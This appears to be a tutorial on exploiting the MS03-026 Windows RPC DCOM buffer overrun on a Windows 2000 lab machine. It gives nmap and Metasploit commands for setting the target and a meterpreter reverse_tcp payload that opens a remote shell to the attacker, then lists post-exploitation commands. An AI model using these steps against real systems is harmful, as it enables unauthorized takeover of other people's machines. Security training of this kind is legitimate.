Steps to Exploit the vulnerability
1. Find the IP address of the machine.
if you have login access to the machine, using “ipconfig” command you can get the IP address. If don’t, you can find the IP using IP range scan if the machine is in the same network.
Using Nmap, we can scan ports.
Syntax: nmap <IP address>
3. Search and find Vulnerabilities and exploits
Searching Google or using vulnerability scanner, we can find vulnerabilities and exploits related to the vulnerabilities.
I was able to find this vulnerability in “msrpc” service which is running on port 135 searching google.
Vulnerability: Buffer Overrun in RPC Interface Could Allow Code Execution
Microsoft Security Bulletin: ms03_026
CVE ID: CVE-2003-0352
· Microsoft Windows NT® 4.0
· Microsoft Windows NT 4.0 Terminal Services Edition
· Microsoft Windows 2000
· Microsoft Windows XP
· Microsoft Windows Server™ 2003
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.
This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on RPC enabled ports. This interface handles DCOM object activation requests that are sent by client machines to the server.
An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system, including installing programs, viewing changing or deleting data, or creating new accounts with full privileges.
To exploit this vulnerability, an attacker would need to send a specially formed request to the remote computer on specific RPC ports.
4. Find the Metasploit Exploit
First open the Metasploit.
Then search the exploit using the search feature
Now you will get this exploit: exploit/windows/dcerpc/ms03_026_dcom
5. Setting up the exploit
Type the exploit with “use” command to use the exploit.
Syntax: use <exploit name>
Then type “show options” to see what settings we have to give to the exploit.
Now set the RHOST (IP address of the windows 2000 machine)
Syntax: set RHOST <remote ip>
Don’t need to change the RPORT, Use the default port.
6. Set the Payload
We don’t need to set a payload manually. Because automatically a payload will be selected by the Metasploit itself. But we can also set a payload.
In here, I will use “windows/meterpreter/reverse_tcp” (this is the default payload).
Syntax: set PAYLOAD <payload name>
Set your Local IP address as the LHOST. Using “ifconfig” command you can find your IP.
And set a Local Port. Default is port 4444.
After all things done, run the exploit using “run” command or “exploit” command.
Within seconds, you will get a Meterpreter session opened. Type “sysinfo” to get information about the system. Type “shell” to open the windows shell. Type “help” to get all the commands that you can run.